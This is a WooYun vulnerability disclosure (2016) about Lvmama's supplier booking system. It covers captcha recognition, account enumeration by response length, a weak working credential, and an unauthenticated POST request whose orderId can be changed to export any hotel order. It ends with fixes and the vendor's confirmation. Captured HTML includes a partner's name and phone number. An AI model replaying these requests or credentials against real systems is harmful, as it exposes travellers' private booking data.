当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0204186

漏洞标题:驴妈妈旅游网某业务系统从验证码绕过再到任意酒店数据导出

相关厂商:驴妈妈旅游网

漏洞作者: Aasron

提交时间:2016-05-02 20:52

修复时间:2016-06-17 09:40

公开时间:2016-06-17 09:40

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-02: 细节已通知厂商并且等待厂商处理中
2016-05-03: 厂商已经确认,细节仅向厂商公开
2016-05-13: 细节向核心白帽子及相关领域专家公开
2016-05-23: 细节向普通白帽子公开
2016-06-02: 细节向实习白帽子公开
2016-06-17: 细节向公众公开

简要描述:

驴妈妈旅游网某业务系统从验证码绕过再到任意酒店数据导出(5.1你还敢开房吗?)

详细说明:

驴妈妈供应商管理系统

http://ebooking.lvmama.com/


1.png


#验证码可识别
验证码说实话,确实太好识别了,关于验证码算法,之前有案例
验证码太过于规则化,不具有复杂性、干扰性,色位差等原因

1.png


1.png


1.png


几乎可以达到%99.9的识别率,毫不夸张,在我发送2万次FUZZ当中只有少数无法识别
在登录框并且有密码错误等提示

1.png


测试中长度为7041为正确帐号,
返回正常内容

HTTP/1.1 200 OK
Content-Language: zh-CN
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=UTF-8
Date: Sun, 01 May 2016 12:03:19 GMT
Server: nginx2
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>驴妈妈供应商管理系统_首页</title>
<link rel="shortcut icon" type="image/x-icon" href="http://www.lvmama.com/favicon.ico">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="keywords" content="页面关键字">
<meta name="description" content="页面描述">
</head>
<body class="home">
<script type="text/javascript" src="http://pic.lvmama.com/js/new_v/jquery-1.7.2.min.js"></script>
<script type="text/javascript" src="/vst_ebooking/js/lvmamajquery.js"></script>
<link href="http://pic.lvmama.com/min/index.php?f=/styles/v4/modules/calendar.css" type="text/css" rel="stylesheet">
<link rel="stylesheet" href="http://pic.lvmama.com/min/index.php?f=/styles/v5/base.css,/styles/v5/common.css" >
<link rel="stylesheet" href="http://pic.lvmama.com/min/index.php?f=/styles/v5/modules/dialog.css,/styles/v5/modules/table.css,/styles/v5/modules/arrow.css,/styles/v5/modules/form.css,/styles/v5/modules/button.css,/styles/v5/modules/paging.css,/styles/v5/modules/tip.css" >
<!-- propage.css 项目页面样式 -->
<link rel="stylesheet" href="/vst_ebooking/css/base.css" >
<link rel="stylesheet" href="/vst_ebooking/css/easyui.css" >
<link rel="stylesheet" href="http://pic.lvmama.com/styles/v5/ebk.css">
<link rel="stylesheet" href="/vst_ebooking/css/contentManage/kindEditorConf.css" type="text/css"/>

<script src="http://pic.lvmama.com/js/common/losc.js"></script>
<script src="http://pic.lvmama.com/js/common/losc.js"></script>
<script src="/vst_ebooking/js/My97DatePicker/WdatePicker.js"></script>
<script src="/vst_ebooking/js/notice.js"></script>
<!-- 公共头部开始 -->
<div class="header wrap clearfix">
<div style="display: none;" id="sessionUserName">zxy</div>
<a class="logo">驴妈妈旅游网<span>ebooking测试用</span></a>
<div class="adbox"></div>
<div class="topinfo">
<p id="welcome">欢迎您,zxy <a href="/vst_ebooking/editPwd.do">修改密码</a> <i>|</i> <a href="/vst_ebooking/loginOut.do">退出</a></p>
<p>合作方:zhouxinyuan&nbsp;&nbsp;电话:15000480888</p>
</div>
</div> <!--header end-->
<div class="enav wrap">
<ul class="enav-main clearfix">
<li class="nav-item" id="home"><a href="/vst_ebooking/index.do"><i class="icon icon-home"></i>首页</a></li>
<li class="nav-item" id="route"><a href="/vst_ebooking/ebooking/prod/route/getRouteHome.do"><i class="icon icon-product"></i>度假线路</a></li>
<li class="nav-item" id="ticket"><a href="/vst_ebooking/ebooking/ticket/pass/getTicketHome.do"><i class="icon icon-order"></i>门票</a></li>
<li class="nav-item" id="hotel"><a href="/vst_ebooking/ebooking/prod/hotel/getHotelHome.do"><i class="icon icon-notice"></i>酒店</a></li>
</ul>
<div class="enav-nn">
<a href="/vst_ebooking/ebooking/announcement/announcementList.do">公告信息</a>

<a href="/vst_ebooking/ebooking/user/findUserList.do">用户管理</a>

<a id="smsConfig" href="/vst_ebooking/ebooking/sms/showSmsConfigList.do">短信提醒</a>
<a href="/vst_ebooking/ebooking/advice/findEbkAdviceSubjectList.do">优化建议</a>
<a href="/vst_ebooking/ebooking/manual/findEbkManualList.do">使用帮助</a>
<a href="/vst_ebooking/ebooking/mobileversion/showMobileVersionPage.do">手机版</a>
</div>
</div>
<!-- 公共头部结束 -->
<script>
setInterval("autoRefreshService()",60000);
function getNowFormatDate(date) {
//var date = new Date();
var seperator1 = "-";
var seperator2 = ":";
var month = date.getMonth() + 1;
var strDate = date.getDate();
if (month >= 1 && month <= 9) {
month = "0" + month;
}
if (strDate >= 0 && strDate <= 9) {
strDate = "0" + strDate;
}
var currentdate = date.getFullYear() + seperator1 + month + seperator1 + strDate
+ " " + date.getHours() + seperator2 + date.getMinutes()
+ seperator2 + date.getSeconds();
return new Date(currentdate);
}
function autoRefreshService(){
//如果cookie不为空并且与当前时间比大于20分钟
if(getCookie('ebkUser') != null && getNowFormatDate(new Date()).getTime()-new Date(getCookie('ebkUser')).getTime() > 1200000) {
setCookie('ebkUser',getNowFormatDate(new Date()));
$.ajax({
url : "/vst_ebooking/autoRefreshService.do?userName=zxy",
type : "post",
dataType:"JSON",
data :  $("#loginForm").serialize(),
success : function(result) {
}
});
} else if(getCookie('ebkUser') == null) {
setCookie('ebkUser',getNowFormatDate(new Date()));
}

};
var forcedChangePwdDialog;
$(function () {
var $span = $("<span>"+ +"</span>");
var bShouldChangePwdFlag = $span.html();
if(!!bShouldChangePwdFlag) {
forcedChangePwdDialog = new xDialog("/vst_ebooking/forcedToChangePwd.do",{}, {title:'修改密码',width:800, wrapClass:'forcedChangePwd'});
}
});
</script>
<div class="crumbs wrap">
<p class="crumbs-link">
<a href="#"><i class="icon icon-ihome"></i>首页</a>
</p>
<div class="index_remind">网页提醒:<span id="pageMessage" class="icon_guan"></span>  弹窗提醒:<span id="windowMessage" class="icon_guan"></span></div>
</div><!--//.crumbs-->
<div class="wrap">
<!--侧边栏-->
<div class="aside">
<div class="nav-quick">
<h2>线路产品</h2>
<ul class="clearfix">
<li>
<span class="libg"></span>
<i class="ui-arrow-right gray-ui-arrow-right"></i>
<a href="/vst_ebooking/ebooking/prod/route/showSelectCategory.do">新增产品</a>
</li>
<li>
<span class="libg"></span>
<i class="ui-arrow-right gray-ui-arrow-right"></i>
<a href="/vst_ebooking/ebooking/prod/route/audit/findProductAuditList.do?currentAuditStatus=noAuditStatus">产品管理</a>
</li>
<li>
<span class="libg"></span>
<i class="ui-arrow-right gray-ui-arrow-right"></i>
<a href="/vst_ebooking/ebooking/route_certif/route/findComfirmRouteCertifOrderList.do?certifStatus=CREATE">订单处理</a>
</li>
<li>
<span class="libg"></span>
<i class="ui-arrow-right gray-ui-arrow-right"></i>
<a href="/vst_ebooking/ebooking/prod/route/findProdOrdRouteList.do">数据管理</a>
</li>
</ul>
<h2>门票产品</h2>
<ul class="clearfix">
<li>
<span class="libg"></span>
<i class="ui-arrow-right gray-ui-arrow-right"></i>
<a href="/vst_ebooking/ebooking/ticket/pass/findPassList.do">通关处理
</a>
</li>
<li>
<span class="libg"></span>
<i class="ui-arrow-right gray-ui-arrow-right"></i>
<a href="/vst_ebooking/ebooking/ticket_certif/ticket/findComfirmTicketCertifOrderList.do?certifStatus=CREATE">订单处理
</a>
</li>
<li>
<span class="libg"></span>
<i class="ui-arrow-right gray-ui-arrow-right"></i>
<a href="/vst_ebooking/ebooking/ticket/pass/findPassStatisList.do">数据管理
</a>
</li>
</ul>
<h2>酒店产品</h2>
<ul class="clearfix">
<li>
<span class="libg"></span>
<i class="ui-arrow-right gray-ui-arrow-right"></i>
<a href="/vst_ebooking/ebooking/prod/hotel/findProductList.do">产品管理
</a>
</li>
<li>
<span class="libg"></span>
<i class="ui-arrow-right gray-ui-arrow-right"></i>
<a href="/vst_ebooking/ebooking/super_task/hotel/findConfirmTaskList.do">订单处理
</a>
</li>
</ul>
</div><!--//.nav-quick-->
</div><!--//.aside-->

<div class="main">
<div class="main_box wrap">
<div class="hotel_info box_border">
<h3 class="box_title">待处理事项</h3>
<ul class="hotel_info_box">
<li>
<i class="icon_line"></i>
<p>线路类</p>
<a class="btn_dcl" href="/vst_ebooking/ebooking/route_certif/route/findComfirmRouteCertifOrderList.do?certifStatus=CREATE" target="_self">待处理订单<span>0</span>笔</a>
</li>
<li>
<i class="icon_ticket"></i>
<p>门票类</p>
<a class="btn_dcl" href="/vst_ebooking/ebooking/ticket_certif/ticket/findComfirmTicketCertifOrderList.do?certifStatus=CREATE" target="_self">待处理订单<span>0</span>笔</a>
</li>
<li>
<i class="icon_hotel"></i>
<p>酒店类</p>
<!-- 调中间表-->
<a class="btn_dcl" href="/vst_ebooking/ebooking/order/hotel/findConfirmTaskList.do" target="_self">待处理订单<span>16</span>笔</a>
</li>
</ul>
</div>
<div class="gonggao_info box_border">
<h3 class="box_title"><a href="#">更多</a>公告</h3>
<ul class="gonggao_list">
<li>
<span>[2016-02-23]</span>
<a href="/vst_ebooking/ebooking/announcement/announcementList.do;" onclick="ancHandler(201)">关于产品推荐上传图片卡死的问题,请大家设置页面显示为100%</a>
</li>
<li>
<span>[2016-02-14]</span>
<a href="/vst_ebooking/ebooking/announcement/announcementList.do;" onclick="ancHandler(181)">关于线路订单待处理任务的提醒(默认时间段为下单时间2个月内的订单)</a>
</li>
<li>
<span>[2016-01-11]</span>
<a href="/vst_ebooking/ebooking/announcement/announcementList.do;" onclick="ancHandler(161)">上线公告:线路行程录入结构化(含跟团游,当地游,自由行,机+酒)</a>
</li>
<li>
<span>[2016-01-08]</span>
<a href="/vst_ebooking/ebooking/announcement/announcementList.do;" onclick="ancHandler(141)">致歉:关于已开通短信帐号8点后未收到短信提醒</a>
</li>
<li>
<span>[2016-01-07]</span>
<a href="/vst_ebooking/ebooking/announcement/announcementList.do;" onclick="ancHandler(121)">短信订单短信提醒时间自定义上线公告</a>
</li>
</ul>
</div>
</div>
</div>
</div>
<!-- 通用底部 -->
<div class="telephone_box wrap">
<ul class="telephone_list h_162">
<li>
<h5>财务结算部</h5>
<p>电话:021-60561632<br>传真:021-69108791<br>   021-69108795</p>
</li>
<li>
<h5>酒店预订部</h5>
<p>电  话:021-60561631<br>     021-60568957<br>     021-60568957<br>
客服传真:021-69108791<br>业务传真:021-69108795</p>
</li>
<li>
<h5>系统服务</h5>
<p>电话:021-60561616<br> 转:3412</p>
</li>
</ul>
<a class="btn_show" href="javascript:void(0)" target="_self"><i></i></a>
</div>
<p class="footer">
24小时旅游预订电话(免长话费):10106060 客服邮箱:[email protected]<br>
Copyright©2014 www.lvmama.com 景域旅游运营集团版权所有 沪ICP备07509677
</p>
<!-- jQuery以及通用js -->
<script src="/vst_ebooking/js/pandora-dialog.js"></script>
<script src="/vst_ebooking/js/pandora-calendar.js"></script>
<script src="/vst_ebooking/js/pandora-ebk-calendar.js"></script>
<script src="/vst_ebooking/js/jquery.validate.min.js"></script>
<script src="/vst_ebooking/js/vst_validate.js"></script>
<script src="/vst_ebooking/js/messages_zh.js"></script>
<script src="/vst_ebooking/js/notice.js"></script>
<script src="/vst_ebooking/js/jquery.easyui.min-1.3.1.js"></script>
<script src="/vst_ebooking/js/jquery.validate.expand.js"></script>
<script src="/vst_ebooking/js/jquery.jsonSuggest-2.min.js"></script>
<script src="/vst_ebooking/js/vst_pet_util.js"></script>
<script src="/vst_ebooking/js/vst_util.js"></script>
<!-- 页面项目js及插件 -->
<script src="/vst_ebooking/js/lineRouteEbk.js"></script>
<script src="/vst_ebooking/js/ebk.js"></script>
<script src="/vst_ebooking/js/lvmama-dialog.js"></script>
<script src="/vst_ebooking/js/json2.js"></script>
<script>
</script>
</body>
</html>


得到几枚帐号,拿一枚权限稍微高一些的帐号进行演示

carrie 123456


1.png

漏洞证明:

1.png


1.png


#CSRF请求伪造
订单无token之类验证,得到之前订单完全可遍历

orderId=25353960


1.png


1.png


要遍历最新的订单以及已处理、未处理的订单都是很轻松
我注意到一个小细节,之前不知前人发现没有
在导出门票或酒店数据,也没令牌会话保护

1.png


POST /vst_ebooking/ebooking/order/hotel/getXLSForHotelTaskList.do HTTP/1.1
Host: ebooking.lvmama.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://ebooking.lvmama.com/vst_ebooking/ebooking/order/hotel/findAllTaskList.do
Content-Length: 142
Cookie: xxxxx
Connection: close
orderId=28536196&visitBeginTime=&visitEndTime=&certifStatus=&orderCreateBeginTime=&orderCreateEndTime=&confirmUser=&travellerName=&certifType=


这里我就结合前面的订单遍历漏洞,直接修改订单参数值orderId即可导出任意酒店数据
拿这个订单号,还是才开的房为例,导出时修改参数为订单号28536196

1.png


1.png


各种越权,各种CSRF,就到这里吧

修复方案:

1.增加会话令牌或token验证
2.验证码尽量采用复杂性或干扰性强一点的
3.在浏览订单或导出订单时做好权限的分配,尽量不要使用直接order等参数进行直接传值查询,可以使用特定标识或身份进行查询(跟条件1是一回儿事)

版权声明:转载请注明来源 Aasron@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-05-03 09:35

厂商回复:

thx

最新状态:

暂无